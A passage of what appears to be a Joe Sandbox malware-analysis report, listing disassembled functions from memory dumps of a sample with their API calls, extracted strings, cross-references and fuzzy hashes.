Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 94fef7ec76be5b14d00368ce5d0aa6119072527a8b7bc11f95b57bf8fa7a9c57
Instruction ID: 1a553b8cb645e03aadd1abf809d84dd8719b8d291aad1a6bed470600257a25ce
Opcode Fuzzy Hash: 94fef7ec76be5b14d00368ce5d0aa6119072527a8b7bc11f95b57bf8fa7a9c57
Instruction Fuzzy Hash: CC11C971C002099FDF14DFA5C944ADEB7B0FF04318F108469F954A7B50EB389A559F50

Function 05860F14 Relevance: 9.0, Strings: 7, Instructions: 201COMMON

Download Yara Rule

Strings

p<cq, xrefs: 05861177
p<cq, xrefs: 0586112C
HERE, xrefs: 05860F6F
LOOK, xrefs: 05860F6A
HERE, xrefs: 05861086
LOOK, xrefs: 05861081
G{q, xrefs: 05861243

Memory Dump Source

Source File: 00000000.00000002.2025449746.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: HERE$HERE$LOOK$LOOK$p<cq$p<cq$G{q
API String ID: 0-1505969064
Opcode ID: 65f55dc59f31f19aef0c08c5fe6ce432e48aa157ac7bd19fec81a00f7198867b
Instruction ID: 2d769bf57e9f6a4856685a75a8b34cbddbf844ed29674021f6da9c6aea1208fc
Opcode Fuzzy Hash: 65f55dc59f31f19aef0c08c5fe6ce432e48aa157ac7bd19fec81a00f7198867b
Instruction Fuzzy Hash: F5A162B4E002298FDB64DF69C998BD9B7B2BB48310F1481E9D50DAB365DB349E81CF50

Function 6CF370E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CF37267

Strings

: IV length , xrefs: 6CF3719E, 6CF372D7
is less than the minimum of , xrefs: 6CF371D0
exceeds the maximum of , xrefs: 6CF37309

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throw
String ID: exceeds the maximum of $ is less than the minimum of $: IV length
API String ID: 2005118841-1273958906
Opcode ID: 2bc4218bdb94c1122e05fa36442e2e172bfd118c719ada5a2ecd37de9eb1000f
Instruction ID: 574164af5bc8cda3b7f18cfbae3a1b79727ccd2c67289f86bb7b08dcdc4145e4
Opcode Fuzzy Hash: 2bc4218bdb94c1122e05fa36442e2e172bfd118c719ada5a2ecd37de9eb1000f
Instruction Fuzzy Hash: 6A617271108380AFD331DB68C894FDFBBE8AF99348F154A1DE19D87741DB75A90887A2

Function 6CF5AE90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CF5AF27
_strncmp.LIBCMT ref: 6CF5AFA6

Strings

ThisPointer:, xrefs: 6CF5AF4B, 6CF5AFA0
ValueNames, xrefs: 6CF5AEB7

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 05bc1260c71a47ca1cc4b6e281e2c2cbca82e5a6de930cff8128c869246c4d59
Instruction ID: 59e1da4e9427e907bebd4ec9bcc2eeaa699e1fd3eac1822677f5f799d9624f71
Opcode Fuzzy Hash: 05bc1260c71a47ca1cc4b6e281e2c2cbca82e5a6de930cff8128c869246c4d59
Instruction Fuzzy Hash: C751E3712087405BD314CF65C890A67BBFAAFA634CF488A1DF69687F91C723E81D8761

Function 6CF3A360 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CF3A3F7
_strncmp.LIBCMT ref: 6CF3A476

Strings

ThisPointer:, xrefs: 6CF3A41B, 6CF3A470
ValueNames, xrefs: 6CF3A387

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 7733f79250766455b09f3eef13826f613814d00f7acc608423199d894b0e5f67
Instruction ID: ab5f68fa0623a095a9c9dad1c5a8ddea6308f5d50f9cfd835c71a08d4607329c
Opcode Fuzzy Hash: 7733f79250766455b09f3eef13826f613814d00f7acc608423199d894b0e5f67
Instruction Fuzzy Hash: D451D8312083506BD7108FA6C894A67BBFAAF8670CF044A5CE4D98BF91D723E8098791

Function 6CF5B9B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CF5BA47
_strncmp.LIBCMT ref: 6CF5BAC6

Strings

ThisPointer:, xrefs: 6CF5BA6B, 6CF5BAC0
ValueNames, xrefs: 6CF5B9D7

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: e7a8d8ee6c085c22ea798a8ad66595099929e53265abec09d90e37e3752ce0dc
Instruction ID: 1b06006adffcf31d73725aae9a4e13dd39233c67053ce78b7cd325b786d65be3
Opcode Fuzzy Hash: e7a8d8ee6c085c22ea798a8ad66595099929e53265abec09d90e37e3752ce0dc
Instruction Fuzzy Hash: 7251F3352083445BC3148F6AC890A67BBFAAFA6318F448F1CFAD687B41D762E819C751

Function 6CF41B70 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CF41C1A

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

__CxxThrowException@8.LIBCMT ref: 6CF41CDE
__CxxThrowException@8.LIBCMT ref: 6CF41D3E

Strings

TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 6CF41CF0
TF_SignerBase: this algorithm does not support messsage recovery or the key is too short, xrefs: 6CF41C67

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
API String ID: 3476068407-3371871069
Opcode ID: be0f075b96f8a6a30433ca09adfb4a14faa1fd1945968ca5e5154aafcc546091
Instruction ID: 006b912f4c9255e6a24d577bf94bf890961b8572238f9939ce1e71615c1946fd
Opcode Fuzzy Hash: be0f075b96f8a6a30433ca09adfb4a14faa1fd1945968ca5e5154aafcc546091
Instruction Fuzzy Hash: CD5159712083409FD324DF68C890F9AB7E9BFC8714F108A1DE58987791DB70E9098BA2

Function 6CF04010 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

Part of subcall function 6CF69125: std::exception::exception.LIBCMT ref: 6CF6913A
Part of subcall function 6CF69125: __CxxThrowException@8.LIBCMT ref: 6CF6914F
Part of subcall function 6CF69125: std::exception::exception.LIBCMT ref: 6CF69160

std::_Xinvalid_argument.LIBCPMT ref: 6CF04067

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

_memmove.LIBCMT ref: 6CF040C8

Strings

string too long, xrefs: 6CF04062
invalid string position, xrefs: 6CF04025

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: dae29dd93da46e438addf736cc45b2deeb69c0cedb67624215af7e1ba21b79bf
Instruction ID: 604dfe4266ff8f67dcd8c44e64c4b5a78455ec8596b96d726b00fae490e97dff
Opcode Fuzzy Hash: dae29dd93da46e438addf736cc45b2deeb69c0cedb67624215af7e1ba21b79bf
Instruction Fuzzy Hash: 3C31E9333046109BD7208E5DEC90A5AFBE9EBA1B69F240A2FF551DBB40D772DC4097A1

Function 6CF6C23B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6CF6C24E

Part of subcall function 6CF6C1A9: ___BuildCatchObjectHelper.LIBCMT ref: 6CF6C1DF

_UnwindNestedFrames.LIBCMT ref: 6CF6C265
___FrameUnwindToState.LIBCMT ref: 6CF6C273

Strings

csm, xrefs: 6CF6C23D
csm, xrefs: 6CF6C24A, 6CF6C25F, 6CF6C272, 6CF6C290, 6CF6C2A0

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
Instruction ID: 12834957179e0058d8e2451478b44ee85f6601a41f83058aadba389c4f2f6f68
Opcode Fuzzy Hash: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
Instruction Fuzzy Hash: 1901F671401109BBDF126F92CC45EEA7F6AFF08358F104010BD9815E20D73699B2EBA4

Function 6CF42300 Relevance: 7.8, APIs: 5, Instructions: 257COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CF423F3
_memmove.LIBCMT ref: 6CF42460

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 025b7e52819b67a851016ffba59a88168b1a28e5939e799cef25798314558627
Instruction ID: 19867b97512ff951a52d0f98c9db47b5db4e7ae50b7f68bc42f4470bd2f689de
Opcode Fuzzy Hash: 025b7e52819b67a851016ffba59a88168b1a28e5939e799cef25798314558627
Instruction Fuzzy Hash: B89181B16087019FD714CF59D884A2BBBE9FF88714F208A2DE495C3B41E735E905CBA2

Function 6CF23C10 Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

SafeArrayGetElement.OLEAUT32(?,?,A64A5C11), ref: 6CF23C49
VariantInit.OLEAUT32(?), ref: 6CF23C81
VariantClear.OLEAUT32(?), ref: 6CF23D26
VariantClear.OLEAUT32(?), ref: 6CF23D30
VariantClear.OLEAUT32(?), ref: 6CF23D89

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$Clear$ArrayElementInitSafe
String ID:
API String ID: 4110538090-0
Opcode ID: fd3cee1a4fbc4460fa4f29ec384b8d89fed2e448bb09660f7d71a8244f9e7f95
Instruction ID: ecc44568bb193ed78e2c7b310ed22a0a913feaff3295da65753deb3767a74d27
Opcode Fuzzy Hash: fd3cee1a4fbc4460fa4f29ec384b8d89fed2e448bb09660f7d71a8244f9e7f95
Instruction Fuzzy Hash: F7618FB6A01249DFCB00DFE8C880AEEB7B9FF49314F258599E515AB350C735AD09CB50

Function 6CF31D50 Relevance: 7.6, APIs: 5, Instructions: 144timesleepCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(A64A5C11), ref: 6CF31D91
timeGetTime.WINMM(A64A5C11), ref: 6CF31D9F
timeGetTime.WINMM ref: 6CF31DBB
timeGetTime.WINMM ref: 6CF31DC9
Sleep.KERNEL32(00000032), ref: 6CF31DDC

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Timetime$Sleep
String ID:
API String ID: 4176159691-0
Opcode ID: 2831f50b567f0bc629d6aee73a6347cb15cf04b95939f76771b5117c703b69d7
Instruction ID: 5d0d7983cce1c308ab283cfd4222b70b16789fab7b8513a4c02542f621c350c6
Opcode Fuzzy Hash: 2831f50b567f0bc629d6aee73a6347cb15cf04b95939f76771b5117c703b69d7
Instruction Fuzzy Hash: 7951DDB1E15254EFEB00DFE9D88179EBBB8AB06304F14946AD40CD7B90D772DA448B91

Function 6CF16D40 Relevance: 7.6, APIs: 5, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

_rand.LIBCMT ref: 6CF16DEA

Part of subcall function 6CF69E0C: __getptd.LIBCMT ref: 6CF69E0C

std::exception::exception.LIBCMT ref: 6CF16E17
__CxxThrowException@8.LIBCMT ref: 6CF16E2C
std::exception::exception.LIBCMT ref: 6CF16E3B
__CxxThrowException@8.LIBCMT ref: 6CF16E50

Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C04
Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C1E
Part of subcall function 6CF69BB5: __CxxThrowException@8.LIBCMT ref: 6CF69C2F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
String ID:
API String ID: 2791304714-0
Opcode ID: 1345479322d3c6e12903d77aff98068c950c067f39824f309596922ae4a75eaf
Instruction ID: 849f8f7b3fbcbc2ab6b63d83281e92f0963186c79914093b7b9ee1eadfe2d639
Opcode Fuzzy Hash: 1345479322d3c6e12903d77aff98068c950c067f39824f309596922ae4a75eaf
Instruction Fuzzy Hash: F13117B19007449FC750CF69C880A8AFBF4FB08314F54896ED85AD7B41E775E608CB61

Function 6CF17750 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CF17761
LeaveCriticalSection.KERNEL32(00000000,?), ref: 6CF17782
EnterCriticalSection.KERNEL32(00000018), ref: 6CF17796
LeaveCriticalSection.KERNEL32(00000018), ref: 6CF177CE
QueueUserWorkItem.KERNEL32(6CF31D50,00000000,00000010), ref: 6CF1780C

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ItemQueueUserWork
String ID:
API String ID: 584243675-0
Opcode ID: dba3d07f2b968c992ea093532e345cacf1f70e3c5d15f3680835f3973b9c18be
Instruction ID: ae88a2676cf9e7239759f00cb6073a4fa59c6ad3f96b44986b4e337165cf05cf
Opcode Fuzzy Hash: dba3d07f2b968c992ea093532e345cacf1f70e3c5d15f3680835f3973b9c18be
Instruction Fuzzy Hash: 0E21A17254A209AFCB40CF64D844BABBBF8FF46314F10895AE45A87E40D730E648CBA0

Function 6CF05AAC Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CF05ACB

Part of subcall function 6CF69533: std::exception::_Copy_str.LIBCMT ref: 6CF6954E

__CxxThrowException@8.LIBCMT ref: 6CF05ABC

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

__CxxThrowException@8.LIBCMT ref: 6CF05AE0

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::exception::exception.LIBCMT ref: 6CF05B18
